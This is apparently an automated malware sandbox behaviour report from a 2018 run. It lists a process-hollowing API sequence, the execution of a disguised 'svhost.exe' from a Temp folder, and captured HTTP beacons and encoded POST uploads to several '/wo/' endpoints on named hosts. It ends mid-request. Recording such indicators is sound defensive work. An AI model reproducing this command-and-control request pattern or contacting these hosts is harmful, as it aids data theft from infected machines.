cryptsp.dll.CryptGenRandom
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
ntdll.dll.NtQuerySystemInformation
cryptsp.dll.CryptGetProvParam
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptEncrypt
cryptsp.dll.CryptReleaseContext
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.DeleteFileW
kernel32.dll.CopyFileW
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.CreateProcessA
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
kernel32.dll.GetThreadContext
ntdll.dll.NtSetContextThread
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
ntdll.dll.NtResumeThread
kernel32.dll.SwitchToThread
psapi.dll.EnumProcesses
kernel32.dll.GlobalMemoryStatusEx
ole32.dll.CoWaitForMultipleHandles
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\svhost.exe"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04b_64 Seven04b_64 VirtualBox 2018-07-09 23:04:14 2018-07-09 23:07:06 172

16 HTTP Request(s) detected

http://www.plodameg.com/wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj
  • Hostname: www.plodameg.com
  • IP Address: 199.192.20.201
  • Port: 80
  • Count: 1

GET /wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj HTTP/1.1
Host: www.plodameg.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.alexander-international.com/wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj
  • Hostname: www.alexander-international.com
  • IP Address: 52.5.142.190
  • Port: 80
  • Count: 1

GET /wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj HTTP/1.1
Host: www.alexander-international.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.alexander-international.com/wo/
  • Hostname: www.alexander-international.com
  • IP Address: 52.5.142.190
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.alexander-international.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.alexander-international.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.alexander-international.com/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=HXKKNrI4AHn5IaIH~0gFxTeF9900MCBGAUzA(JFKipOqk83mXjIlN0K9o2saTfFZEIqJcW~M~-g5Ol9eDc3svba05tZLFxhOj3NjT17jVyAx0pj4qoqyzqq3f_3je5n_IfSyi-ZOXNB_kKEbDqxGpr~azkRcut0M(mzlE-ojIMiwTH7oTlVan4gt5_mDxTyciQ2aUWBcvEjZ7RW55b7oPYSSKzmCr974cQ4HbQB0RNMmmcsaheivoxD4m3B06fC7iFBtUjuiRZgBKhkXBu~a~hrP86MXtzeQIrI15vRm8WcSwz6lWGLQbI3BI5crFWezCSDXj4WduMKNYglsbjAGHQ~VBBaPmj3_QZnIGICCoPCITaH7g1lRneg5lUTB6c9-Cpmy6xl5zMS39s(DWPl1waUzDS5PQ2VDjii4CsJCnfJRbE2Qj-V69fJzcoJ2BZ99gVO7A5SltSJtO-YUh9bQDFAl(ekFs81fm8DF(h2w6ZZzNuBX2rvfZaN563k53R5WyOHMZEp-bX02fCkOfND_yvSvOnQpX0sN(6yY3_lfny~4lo9MYSnX(jD8Q9ccoy(IyyKdaYIyJnEkiPkBQ2JojVN4q95rLIyTvCGEH_HLEdlCC0MfssqyXTTXFBICxGYHjTv-TkWDVuDyNm8cBPR9PFlEZeiiZzrcJMqpsWBIq4iY0ZTVGrkRGq(7YL8q9g2m3KUSpyHDInVmE7dT4jotjUa6CAvaUi2BwGheSGBAElvsy5(4fLBzvgmE34SAFc9qbLkIGZSSsvRhP9ncYH(IsBEdbsURhaT9MFArA3d_xgWeZjm3B3AqPuLH66UYmCYn5KUxsIQFrhQUJy0WuORbmaNf3A(r8j51MostjP10hokT7oWEnC1ovL5rmubl6Rsh5hT7F37xJ4SqzbBeo8Jxc9(flD(alExFdkEGX529pkiQSDHJDJURuo~_OuCt60e7IEy_91i6YBcsSRl_qGf-LolNWRTcZrvR95E91-zytlFiu-JxYg061lRgSmEgLNmVf3ip4PS5lHjRJiiMSpdfKzVvFgPX6nT8XqYiyz20hO9BohU1k5ykggAim8PzIPBi7x5yVKGZXbFEc552yjGQuWAAG8sRHelVXy0T8bXzK9BPKhqm09WCKQwo6hYfKVMkVxskIXnEayRQJldtghRNoRXt6xqMBKOY0n389Azjc0rTbBn2StdDPkrBi_hVBbYK(uRGD-P77y0FzPSWskLvqNrsUj0EQ8s1KBkEtVBKD3PIBJc4qYcRfL~cGCY4aOCh5GvTZpC6Qn9XE8kxxB4P8RB1EtB0LbYAj5gpUR(cSigPGZm7J59vdNnTo6vdmQtAxdwu0vRifWMXeDy11bkG8D5kVdOFthltXMmgwC91EbhBUH94cWtDGdySukaSoEMAXqLlEiprXSpHtkUH8qVeKDvuHYWb1hm38eeDvFL1hnFK8j5biEfKDesRD82nzNmDEtYZp7a9FC37LAbejr1wcK8SwCV8Z5JAB5GBDVcNfe4iBWoRXl4-Q3ti(DF6rfSkfa7rFeoPvbJmt-YSiJiPWybqL_ztI-xT2D139iNukKQAiDm-bBnr~tLiH10EWF0dCQYqi7NFlmB-qjBV6fuKgbseysgcNLPvk8izj3Lzz3Pkxdnn9GrUwUGajujJmYb9mkI4LwwxlTAe5hP7kBZZjU(20wggiZLNnf62uJ~LYBJvRipd8F~MbI1krQb3~LUldTaebIATdobx88jMmHzJ2re8kduldcocOkZ8SfmBdLp9Ur9Yeu5t1d3zQAjN6gUanEEp5btbvqG6Xoxi0Sc3L8CovJ(RQdJrCqzQfOOO7nwdGcI_5N8ZnOm7yPrIUXanwsad~x85BZa-W6jQGZKZ0Udw(RngrQ1Hg03fZXxe9OQ9P4bg8po4pygla-Uu3vhd7SuP05~pWHnO4v~1HTvjGDn-LJqiyIeZl2sp2p66w4UU6q3boQ(yyt4g9K1hjaWl7HOQ2Dv2IBTr9gMYRSdEnll6Iv2ImbekKNS1~KR_k59J6fiV7uNz6iqMeC1OT4RPSrvHeS8Dq5jiGs2OUcjog97VIw6qO-54uOBpzY9HW6hMwZTbxAMsIKnVtWQTZPviwO7M0UPjrQqsBd(-eheg2lFWfX9s~HVXEqrkZFzYiafcbgU6N5oh5J4EGBI_BsF3oG2Dwn4v8mzn\x00\x00\x00\x00\x00\x00\x00\x00

http://www.alexander-international.com/wo/
  • Hostname: www.alexander-international.com
  • IP Address: 52.5.142.190
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.alexander-international.com
Connection: close
Content-Length: 57160
Cache-Control: no-cache
Origin: http://www.alexander-international.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.alexander-international.com/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=HXKKNoZLF3roZIh_61xYsjuRytw-PVt5DH76(I1O5Ye4jcHmfBgmKUK88GsZY_4waOKBcXKi~-o6X3FbB-f3sLGmm9NSUElBjVxJYUDjISEz6b7jm9Cu7uCxLtGjF6fOHd~2rblmTPR0oItyCMsHtbro4FEVuOR74iugIdYKCsGABAPeTn5n9NpR3cX1yh7rmXuaXlRqkn7XnCf8~ICab8XGJyWFlMb7fSgXVRF5XMEy(7omj-mmzAzFrUht6P(6lDRTZjyRcLsNBQFoANSo(QblktwX6y~sLpQu0vQA~WEVrD6ZWGPYa_G4UpctagvvHyaCpYGNu5WNaC9_MxoDIw(LIxqDhU(2QZ2SH4KCpNmIFOb0i1lRp-g_lUTZ6c9XCrGIoh95j8ux8ajzHs5By6UJET5jU1gqjjqgCMVCkuteNxeUpLospqJaPIwoBZB4hUeRXIu4sSJqFv0Ll42JHVw6nZA2hsh1mf(w4BO89u5ZU-VpmpDTavpo~0hk5EA1zuCxM1EXdRQ8e0hZPcXr7O(bBFE_Hlcyu77I3vRL(AGWrohbPwCMpxiwWLsatTvN3BLVPZwNMnJ6oaMQQV1Wy20LodVWEqzA63yoNP(qA84QLnsXkYTkT2OueXJ1wkEf2CfwOyL1E8LDDQ0-NLJBCm9kbOu6azjpXYvHmX998val4szNcLY1Q4HweYF7~CGCssstlwHCO2RpJvBv9Q0WkkyLLzXCICHbwFBaS2FAFlDsk-L5co5w0gnP7oScd8xYbJkUcZWStfBjJMnGcViyyxFSXNYClazUMHtiB3ICnTGZITGzA3AtAsu7rKYriGlC56AhmdQs6T4EPhMfkLxAibt12gy3lhdCY5Av9o4xqJch0raUrm9ggox6vPDEwgZj6U33X0WMdrKjq-N4odRPZNz8qkLFlWoQX0cnWZCHn2XMZjqeRpgJ(NS4OcCH7Ru3BXLvkBqsRRonTTQEuFjmHa0dWxX6QJfazqM30Jm2uzU0pbldREkB7AdSTCgaNpreAF(a0dbH2mnwOxT_Z6RCLAUEHQKj9iCdZ91M0EKVytQxuT4jrMKcjDgQgqfeGOYnzhZ7AMaUS_h1dpdGmyjNl19iVc1VRZ5lXwMl8-(zLtJPYCim8cL0VEhn9S8jU1QpS30mJ1PbJQpNY1ROojA-uDTXrR~RYd~F13~B1TSbc2LTbiTJXMliIlmbhch3BK5Ko7JSa6ibjzEb1I~tpiidh727W39sSt88FBJ5uTtjDjezCtYtpb0mSbK0TBIPYOXhxGP7T5m3IEFLMvpb1zkHnA4ePqxlXp0InNkuMXysERQ8O6SMZ959fdaDqKOT(SBe1qAJh-loXCkTQAvssqci4l5RcPb_swJXd9yHwn5kDO53YUAgeDY5G_SD8FmGp1BaQfz2OBpWfxkEi1gK9K9xSHP2bufe6li21-TU5hLjgwwd3VhokDKbO-sia8uzmfGDEuoFj_ykXj7xLUvnktBRaLUThxNUUYVgJZ6wVHZgTeQ2LR90UVgcZV1y7ABE9-WnabuMDsJRvrozmPkSvYCuOjLSKeasWeBth0VB6jt2kJ0HsCefPhToxtOiF1VTA1BnJwQhvqFT9H5ml1FVyNKO1oI0s70WMMTr~vWonEnZzHSzg_jB4Qbm~FyU0dzZi6j4il8AYg8TrUIZ8y2suBdItVvU2Ahkn5(smv2CuLv3UyxoRjBew0W5Y6l6~EeB(JsHXU2icpgfGuf61eL1vnDMypyMhfbpd4suDjJAUYG6ea5VQ8piV9QzxvziQ1eCrD0eqXhfvv5MiN3NRLlh3Qkgctuv(rORR_FVHrb_I_PrnhdbApMN6IMct-Kxs9aecH2o9-KV0Tk-DtC-UZ7XWJGLzwZmhFPf0R1jkFbpRU5t8vRvGoCi8qYE8SgbZc0A495owxqBuN3ld26c7p6zPD3jJATIP4zE1LS6xBQ1(pyzxboJ25XZnH~_29E196NMmaqazheRywjoNRvy1jwKDn1VpkdeKKOgmZf4Bv2YvKtAor9k5t~f6_BK4Fr1Z1ZcM5NzfKLcfBgnp43TbdGzEMXnkqvlIjiMEtwlvvt3~6ciY5lVsamz4kIsc47M6WsGU6jqhMes5GSb2iO_WsrSZRzwoFgKQ0NO8HZ1QJ(zbn7ToYXaZDM0QNgV4aFhBUcDBrNmhHuL0g8DtD6y0-67M8HYlVhPkfHT1Thb(ARvLLkKvimsIvl4GquTXe35~aaHSVPRta8kt3btYeQpczS5Nf(lmuDPluIvL4PLYgr_QdQiwhZ68-(i3dSpFsh8Y9zVMvL718HqrVKnz1znPh~9zCbNKwSMgAK9D8lz~Iy8ECdZ7QHugYa8VMAl5DUvPn0INatMi

http://www.ipducks.com/wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj
  • Hostname: www.ipducks.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj HTTP/1.1
Host: www.ipducks.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.ipducks.com/wo/
  • Hostname: www.ipducks.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.ipducks.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.ipducks.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.ipducks.com/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=JEC3VXI9YLVKnqz4M3TLZE3RMtMSiVK0PDzP6n68FuxmRmoNbh1T4wdZAZdiOIItxy(r3DDUe4Ujpj0F57MKxsJSSgy0srVtO_HjXKxziCI9fEcOciAt4Xcankvd(EXq(alNuBWpA2IGyYcE~ju9g7CJzcQ4eut1NZ9s2agXOqds6SmcLNCzp7jDJ57j2za5fY0ZG_DATOpPVNY4jEMgP76oVe9QMI0eHJmFi7HLI7~7XK2jcofj2uijjDYnfYtfM0VKOd~4Taji88kVQa9UjDJmgnjjDVs1khcy8TBhPHYCwxGvzQfmpx(CjwZY3u0JW8kBbfNIvaefRRSCcneMa6LKNKo_bH3wvsIWYjXQK3rsHgNiyLkisxGSUNx7plXS54xKX3uZlf8rEYlORHr5juSgug1hQ0Fls4hYJtba0_Z_jKXJfVtONWa8D-bIYVlgNRIyawHLv4OY7A9r1XQ-T66yA15W2Zpu4JS-lE6YNSxpT-p_~3bTIcJSMBbo4VsodyinC8UTkOiqjCYx9crlXp6bkvu7YOAoHd3Cdd9aaA~wg9w0Bt7dUXfUAhAPPWCFQfxF9LptSBsBSnGqjvyhvojZrd(VzFYY34adlknpQnx6B_N-qggYvzscjxhYK-a1utYc(S9_I2eb6TVNlVltk4adI1p533ZTX3(iO0oWhga7CJ(K7jEdOdtgwLcB10ryv05l0UoCE8uUdyNTE7pGPg9mrXRiKQ15VVpOidnQP92digOX~R1ZxI5J84VbJO2wB-zYMxClfR7pTqbDx9zeo1fxG0ZbQh~Lym(ROQPxLRFx~2PnzsLSWVXCWFx1AH6OzdV0xze_YA~KoAjcnjzMtsqeKTIK~vlq03DCnoz-(L1dzw1ARckNLqa5J_oPLEekBqvPxkEiSmAlAwz0aDVsZQSlNEOkD3Y5l7bLMfKdiADRusuEaLL8PMshsD6v(DmKfY8Yml7pQ32PoDsL8G5iwTHpJ_oTV5ILgqojM9nfT09fUWJszN~tk9l6mZaijKnSusaibJ7xiTcypE1gIEv2uXBUgTpXqyLiKZE4Uy82mD6_Gp3hA-pBDKBDb5wqW6ORpWAfUz5tKWpxzLWwiecg(QAYui01kEaMzfnIceDD9OqBjeEu~C614TT6jte1~ozQORGEl29aBQKYx95EcfBk0sNHMsHiBGjSviMJGCENBkSHx-zO88Jda7RUw2lDU_EiHDleGNuUXfTuR9aXBMctQB52dpzoAR4dCtXuov8BAw(GGy3M5yNcjtcnV0ss3Px5AIwXRbk5rIHctwksynF5NKb57e(XTS~TuVLSksoYhBSmpym6dkABybWz2u6qzZJuJfr0trRndGvz4MeCY43Iee46XOX1TYAOehtVjSxTt2jQBAA3CdOObDfEw-rroaTs7j9_KjW_rGcPUb4T1xA-fS8vT7dt(dWIa7tC1UVEp08YBDVDhYOq2d~LB5rRArdQM0a57Cbl8AleeG6wesxFI1L_Kju1fjkKvqV15EF6BFY5APD2OZtAic78xsoDxwxNFJNN5kEt4Nvl0gju4-cCwI9EqamVm8N0axwHwa1Yk3QYWuzkKKMQQxlbQKAZx5fEFP5R3I8iLjbc2Enj3-MFIX3JRfs0VhBaqn0FLBSEvm2F~hNj4dasGmmeBgxJOM1Plsc9DXSnvVIhbLLAKK0FfGKJYP9-~c54jqKUARLtBB3mXp2HG74FjQ7L2d(T5SXl1o20TvaIGfsDfS4ih5mamRvV~wLazCrvb-7ck4Za1Wo5SN7WO9Et0KbwI0bUk4YU~jDGTEsZ6P04ISa9a_tGvDSBqiPlq-B_NBXT3eiFL6o8~rLTWckHahogPYAx3Up1HlZqX0iyFTlE7YniuDxiEUJW50bZ15iLSr0oGjIO5uvDIv6LDen016qAIWG03jy3zY8Bnxv1898Xq0mPlfxcWfy_BwrIQjMLRVREC_a110MdE0p8kWLg82WIPeRxNqXARffsih1AmD4adxcrB2MalLdF5v7z7fWBUegsiDaVaLYkahjhww9n5uuqdV40utsviwF9Vy0shw~0tpeb0dVdy94bkTycUqt3~GIHDC~bKea3Rhla1PhjxAgUO9vlGu6cixLpm8L9YMmfl6C-uel9ubKgCnA7n9S0cynoakks3L6QpM~X8-EPbTs2qTgMsd5l00D9mkhKW0tm\x00HVXEqrk

http://www.ipducks.com/wo/
  • Hostname: www.ipducks.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.ipducks.com
Connection: close
Content-Length: 57160
Cache-Control: no-cache
Origin: http://www.ipducks.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.ipducks.com/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=JEC3VWQDZ7RhjobXI16GdknGE9Ic5imhVQ7i6kiwRfh4GTgNQDdQ(QdWEpdhf4M_ygvz3CG_e5sgxWoAx4lcsMVEeDO975tyOd7BSIRzny8sCCgRbQkpnnQYpB7Ymk2M9_dJ(DP8KXANw9o4sVy5qrGK4_s-eN5bKY8v9-IENvt2(A~ULOPHgbz2CYzY1ADCOIAZEOrQbuIJLd5rkT5QNKrGd-NpJYUZANGV65reK_Cnf8HaRoT0puyeuiQIYJB8JyF4TtjORsjuzOtsU9dcjz5A6WrjLmkzpC195zBaJHwO~RG5zRqr4TjgmwZa6LsaSc8JCO8NvrOfQ0XIel25DKLvPaYofwfrvt4CKDPQLxDsNkplwLki5BGQUNxjplX_56QLW3mZjfQtFr9-UV2KsuS8viMlU3Bes_tQJJra3P94oPzNVktNZHv7KeTDYVYgMQYIeR7Wu4OHvEVB4zFvHaqhfnZtl5tU4pG1ljXMMTt9V-sKrT(fdpMtdRHwyEBQPCG3AdZ6zYukixwV8-HxJ6~N8_SXOewXWfaLcMIBPyWku990WLyER2X4UjMeFXSEHdANxYpoRBoeWXnSjMOLo6Kk7tS6xBZ994jihEO_VAwcIt9cmRcrqW5vs3hsevuw35ca8wFyCxrJ(CN_oRgM5PG9Z1dL03gzY2bBKSIzwSWCZrTSyT42K9MLx4lo3RvWwEBRqX41CtbmQmFrIp1tYnRDmkpqKnJAVVh4ltTQM5OdmjWQwX9e744ChoVHUerlB8DMehWlZiTrSrbZ1tGklVe8ExxfUgeyylPePRyMBxhu53v70sKYXw(5QF98dT(hzu4vk2(geDGauT7Zj2bLpvy4FTEYrupd~V3EiYDur6tB8wh6CNs7PtGSGbEqPQGUHa(T10wfZHwYKmuRbitabT35CmX8DhMVhLT-P-vK5C2MkI6uIrX0epMit2G7wAzLXOkHtEfFbniqrCAnrVFLzBHSJfs5X4MW7pQTNLvIUlo9X0Z6s4OGqfEV0sCIluzQj-GeZKj0nAgHuStcCSDK61BZsjl2kTvCEOwiXCUpgErPH7brca1tBrJhSMoXe-DKmANVP1t0J3xL15qi8_oI0zQpo3I-1XC4ze3qc-nDpeiBhOku0nyI8ni9kf7Q3Z2QLTCakTpBACyA6Z9RXdRqx-JpfoHrPhDbj0VpOVp3BimHxfu05fNBUfBD42tHVvl6NRAEKdq5dNLOX63Hfbg4b3FiaZfTDhoAf83K9ppzHkm7JzvV3QVr69J-ZlUA1PleJKpIFY4-yPiH4Sou2UY2HPvP0ZWffUGbomKbrv4rqGPPhUudNBcX6brh0eah5PZONoSd2eZpFETJ8cqWQansSc9KZurVbqF1QUtyiwhCunufIXJhOvf0Cinj0uKitrP9(S5sOWTvw34TK78IzRZkKzQRW9N13cGJUbh-kWxWsn8mERNfgPqU1d~WLpzFLtJQM0i92Cmh9zxAe36jOOB4dg(-GCOZcnkqkLxu~mARCmYtJMqjHJ1I3JHs1slS1FdKTrxr8Xk8qeWCsgvu6P998sZgq7OJrs9WODwTgp9Qk10bWO6mQq5YMhwBWIY3nJ7XXfhUoMosTHH603PjwLUBTgnjSdoIUipWzUcWOy(ruWqRpEE8xc7DakKULjxnEONKvMYJQnfwiXU9XNXDOqJDKUinLP8jyf03ldCKAQjmP2avXsCAZqgeihTJvPGp~VXtxLGUSO7BPMsQQwBY1Ni57TC0ySPSzj7NZtvsi4lhn3ZmVeb4Q_cwnpeOIFSGjMoQ20zzXFMOpcoGQAO4b9VVhjOaszn8rctFMB(75firBuI5upWoVZcKQVImP5Zd8AZuBRxiSzm1IGVE97vltj9KDw0d61297sWBWapTOj49(LaycOCCDe(-~qqIJ12giRbF8-klqQ7P18xxr2ONsP5cMJyjKk(pA00wZ00GAfyv1XwmQGp-rBLys2TSMu5QIqbVZ9zXtD4DpxsfUxI5Az0b2q1h(KXb7ePHa4h6mymQWfUzYz(rxk9C7PqeLTsIysxWtV0bUiAAg0mBjIu5kNRa2tgOkDDJCegs9nkFKhf0EdeiQyRt8v5j5D87Z-qRcPCEojuXlN~ectqui8DbkOodqvKnNExCh66GIwD_aBgd8LaN7_WRjPsxBiJ2tVMkjLNFpmWX0wxGWDwcKcsW6wvvL-QtNM7VvzhT2ex068lZc-jftVM4ykVEb7lxk3EDiq8Aev5es-8T46OicZ~A~qkRy1yNtFWk4xqwXwzzVbukBsCh~I~_3DpXL93EiPHkI5t8lNMZ1gbNJ12YE4GvutrmauPe3dAmT7plF9pq3QYgZebf7g~YbOVWGD4r8AS4h7991Xj2h72uCAH6R9zDskhdMTs5qzLYVtv2B05fXY50Rt(8GfrsN

http://www.employeevita.com/wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj
  • Hostname: www.employeevita.com
  • IP Address: 52.72.89.116
  • Port: 80
  • Count: 1

GET /wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj HTTP/1.1
Host: www.employeevita.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.employeevita.com/wo/
  • Hostname: www.employeevita.com
  • IP Address: 52.72.89.116
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.employeevita.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.employeevita.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.employeevita.com/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=1A6Oj5Do1XxwmRCP6-pvx3PdqHqnMDpfTcm7~RLzT8PBbt7TzBYYydhZ74ASEwZGkrNxbho6mMetzIUB7NcCpa1x6h01jG7wl2g6LZgaXzGh15oQ~sZaMh4QjTU4Ucd8Z-o9uyDEstvDY-4S1xG9QA24o7tOv1pGqx(J~ICCXQs60-w7O3DSid7bqKeJLnERX2Fu2ElNLl(z2cvUJ8Yhe_jKZ4A30bA82To_Xm8ccBlPOMjN0SfeY-oZoK(TK_0zFKTnmVJHE0IJyqxdBzHf1rwewkbzLYgY0ZL87KO9tEEpAEe9qo9YcN7BEoGEH6FlsJgxsCliWCI3Oc5pWuFsiYaXXNdJuE7Ai2BlNaDKMBqMjtm2I9G2(9yMxOFN(TzDw2vR9SzqS5PaFL5CEgJLNE5n0Rz5f84UMImozb(1bic82qAum3d_edMwYCMMVrNJVZ6SG0IyKiMqRsyK2hjauD4PBcrzuqVEASO-XeyYJfshPorwEbCegV31wA~2a8oxiOGMClHxmsQ0Msac4TwZweL3u1h9A88yzrLEcSsWy6ucY-mdxxMjy_reEHpx0e0XvwqT4yK9In~pvexzp2iL6V7sDJtl~40O2WGflGKAkkvalh2rFiYdVM4vOcmqU6uoYasqwwinzvX9ABWabqrWVZNwWTAIcs2R4g2bPsmLenuiITksW6IpLn~lOw0WOlh1~T9SqQPw2IvLmI(GKh5VkWxj5OaUeGuurzWDQCNUfjFwH2sHCXY5lPXUFueaJ1v26TKqRdvl2K2JnyDZ5tda4I4zi0JspoloXRpqsdMtu90IvOHlpDlydEahXmTtWbb-D0X9cvX45iScLV9DCG1kikGuKKr1ZpalXj2JEFYQEQbR3AVWEzIs~KGhDSA5gUp3hWCv5cDeDXXz(9unTjpCcuF2iR8kh9PUs7TKx9w0hiVlLAng7GiamBisuQ4V5-Brzt7BWQAh2P~njjBb19FtggDk4LYtpGll5uEQpafn6CCkYYV_NdA7GSw8cboJS0ECX5BDewCiB-i_7xs6Ywa1zfc3wPoO3YdS07VQF7~eNmOVzMKfmyeClzMi~SGkINiDEC8WfSRotiLffYzFYJ~YwXf7E9Vk0aA0xn1cCo5J5U16bb85jiKCl6amRasw3drNcmGNsKVpsy3Q1_uqrJsDbR0egbKKhirolXgwxlQLrErQus04qsgwoYNjx8PSd1yAzxe1RWfpph~ABSIOs7BcIKXkNMJWZczImCWqeTlc5wDPIneEzYgQKCJXpZXY9JosBl8paSBRlcVxC6D_zzic3R3A1WFAfcC79Qd18JLpwLZZ2wCJ9D3rTVlXk87CKvgYtcruUI(5vEpy8e~7DeuNlzRw83XqH65lRSwwOVldm2raqp7MnkrMPmu_M1pR1eZPjNUIMG9UIYBPDntRSKMHZFv_f_6aKObISFYgj-4vL-(GNcUbc1ju5w6lQPbgMUDwWZnazpD_n8w3eTCOAX9h8kM2cdHbRY~jx0MdnOnREBRKeLtzNHFHIbNmtYaVkrNm~YR_xbrZoo9185M3(U8wjfQBJC03qDxJNSU_ck7YO4P5uvaN7MHTA97tjfwBJoHsm1MuZgrikO(On0NtjUUc4SxPZ9r0K1Xgta(R2OW-pPJh0BltaUQSXIW9TC1RUp1StTJMi17MW2AvhjN8aNsXZS0IxFaq7R3Po3MrElxp9-tU~B95H7otIP~r68qZ0aWZABEhZjtOr4Q_jMCigaGu6YnCKto97lVL369z(i6eJ0UI0K~TLXBxC1nohM1eol4I~Wofz3ga(vedcXsNJNiMsQvTlmXPub84WhEOXByTZY04va7WvPi8eE8QYcnBsbLUUPr4~5wudyCapczZsiv6eVbtJ4h1LmPI3gkkhKvV84LO0_9u4825XRX52Zn6HJsZ~eqwhXLe8RfVZ9qx(Q203vmiZnR5HuuZyiY96hOuXdDft_jaIw(ofKZUYpbEmPLh68dtE_yrfi(zPiJRTliOEcAHaaEm9DRgDvRk1ABbubLpUSJ99zSrrmoU~fbJPbuuJ0s-bfuAw59P7sLMqT5zsy(fgtSvGB9f~1Iy1pwv~fmMyJDku0VToXEn6y4PJUMFrSarKOxzqo3q9ynwOPhQGdPPcF2oXJlZhmUQ6qVwTI7LjbLrJ-bvggxNxABRu7TxYPR4gzYQN_BU\x00bgU6N5o

http://www.employeevita.com/wo/
  • Hostname: www.employeevita.com
  • IP Address: 52.72.89.116
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.employeevita.com
Connection: close
